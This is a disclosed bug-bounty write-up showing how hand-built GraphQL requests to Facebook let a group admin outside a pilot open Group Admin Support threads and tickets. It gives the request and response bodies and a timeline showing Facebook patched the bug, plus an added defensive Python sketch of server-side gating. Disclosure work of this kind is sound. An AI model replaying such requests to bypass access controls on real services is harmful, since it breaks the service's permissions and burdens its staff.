@wongmjane

Pilot Into Facebook Group Support

Facebook Group Admin Support is currently under a pilot program.

This feature is currently available to a limited number of group admins on iOS and Android in English and Spanish.

I still managed to use Admin Support without being part of the pilot program.

Impact

I am not supposed to be able to create a Group Admin Support thread and support ticket. But as of now, I am able to create one.

It could unnecessarily increase the Facebook Groups team’s workload, outside the control of the pilot program.

Proof-of-Concept

Preparation

Use an access token created for the Facebook for Android app.

Create a Group Admin Support Thread

This request will only succeed if the viewer (i.e. me) is an admin of the Group.

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

doc_id=REDACTED
variables={
  input: {
    client_mutation_id: 0,
    actor_id: VIEWER_ID,
    group_id: ID_OF_GROUP_WHERE_VIEWER_IS_ADMIN,
    message: 'Imagine being so lonely, one goes so far as to stumble into
    Group Support just to have basic human interactions. Hi, how are you?'
  }
}

Server Response:

{
  "data": {
    "support_thread_create": {
      "thread": {
        "id": "SUPPORT_THREAD_ID"
      }
    }
  }
}

The response returns the ID of the Group Admin Support Thread we have just created; note it down as SUPPORT_THREAD_ID.

Get a Group Admin Support Facebook Message

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

q=node(SUPPORT_THREAD_ID){support_messages{nodes{__typename, id}}}

Server Response:

{
  "700000000000000": {
    "support_messages": {
      "nodes": [{
          "__typename": "GroupSupportUserMessage",
          "id": "700000000000000"
        },
        {
          "__typename": "GroupSupportFacebookMessage",
          "id": "SUPPORT_FB_MESSAGE_ID"
        }
      ]
    }
  }
}

This response returns a few Group Admin Support Messages; note down the ID of the one created by Facebook, whose __typename is “GroupSupportFacebookMessage”, as SUPPORT_FB_MESSAGE_ID.

Submit Group Admin Support Issue Ticket to Facebook Groups Team

Server Request:

HTTP POST /graphql
Host: graph.facebook.com

doc_id=REDACTED
variables={
  input: {
    actor_id: VIEWER_ID,
    client_mutation_id: 1,
    message_id: SUPPORT_FB_MESSAGE_ID,
    issue_description: 'I poured coffee into my laptop and smoke comes out.'
  }
}

Server Response:

{
  "data": {
    "support_issue_submit": {
      "client_mutation_id": "1",
      "thread": {
        "id": "SUPPORT_THREAD_ID",
        "support_messages": {
          "nodes": [{
              "__typename": "GroupSupportUserMessage",
              "id": "700000000000000"
            },
            {
              "__typename": "GroupSupportFacebookMessage",
              "id": "SUPPORT_FB_MESSAGE_ID",
              "support_message": "Okay, we'll do our best to help with this. Finish submitting your issue below and you'll have a chance to add any details that might help us help you.",
              "fb_support_name": "Facebook",
              "profile_picture_url": "<fb logo url>",
              "support_ticket": {
                "time_created": 1000000000,
                "ticket_url": "https://www.facebook.com/support/?item_id=2000000000000000",
                "status_subtitle": "Response Time 24 Hours",
                "support_inbox_data": {
                  "title": "You contacted the Facebook Groups team.",
                  "status": {
                    "title_text": "OPEN",
                    "color": "FF4A90E2"
                  }
                }
              }
            }
          ]
        }
      },
      "issue": {
        "id": "SUPPORT_ISSUE_ID"
      }
    }
  }
}

We can see the new SUPPORT_ISSUE_ID, and that a support ticket has been created and assigned to the Facebook Groups team.

Since neither my group nor I have been rolled into this Group Admin Support pilot program, the team must have been confused (and possibly cringed) by this ticket.
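The authorization pattern behind this bug, as an added example that is not part of the original post and is not Facebook's code: a mutation that checks only group-admin status, next to the same mutation with the rollout gate enforced on the server and repeated on the follow-up mutation. All class, method and parameter names and the sample data are hypothetical, and modelling the pilot as a per-group allow-list is an assumption.

```python
# Added illustration: hypothetical names and constructed data, not Facebook's code.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """The viewer may not run this mutation."""


@dataclass
class Backend:
    group_admins: dict  # group_id -> set of admin user ids
    pilot_groups: set   # groups enrolled in the pilot (assumed rollout model)
    threads: dict = field(default_factory=dict)  # thread_id -> group_id

    def _authorize(self, viewer_id, group_id, check_pilot=True):
        if viewer_id not in self.group_admins.get(group_id, set()):
            raise Forbidden("viewer is not an admin of this group")
        # Rollout gate on the server: it holds for hand-built requests too.
        if check_pilot and group_id not in self.pilot_groups:
            raise Forbidden("group is not enrolled in the pilot")

    def support_thread_create(self, viewer_id, group_id, check_pilot=True):
        self._authorize(viewer_id, group_id, check_pilot)  # False = admin-only check
        thread_id = f"thread-{len(self.threads) + 1}"
        self.threads[thread_id] = group_id
        return thread_id

    def support_issue_submit(self, viewer_id, thread_id, description):
        # Re-check here too: a thread id alone must not open a ticket.
        self._authorize(viewer_id, self.threads[thread_id])
        return f"issue-for-{thread_id}"


def attempt(call):
    try:
        return call()
    except Forbidden as exc:
        return f"denied: {exc}"


def demo():
    be = Backend(group_admins={"g1": {"alice"}, "g2": {"bob"}}, pilot_groups={"g2"})
    stray = be.support_thread_create("alice", "g1", check_pilot=False)
    return {
        "admin_only_create": stray,
        "gated_create": attempt(lambda: be.support_thread_create("alice", "g1")),
        "gated_submit": attempt(lambda: be.support_issue_submit("alice", stray, "x")),
        "pilot_create": attempt(lambda: be.support_thread_create("bob", "g2")),
    }
```

`demo()` shows that the gated submit is refused even for a thread that already exists from before the gate was in place, which is why the check belongs on every mutation in the flow and not only on the first one.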

Timeline

2018-12-03: Report Submitted

2018-12-04: Further Investigation by Facebook

2018-12-13: Bug Patched by Facebook

2018-12-13: Report Marked as “Informative”, due to:

There doesn’t seem to be much security/privacy impact in bypassing this feature restriction, only potentially creating additional work for employees handling support requests.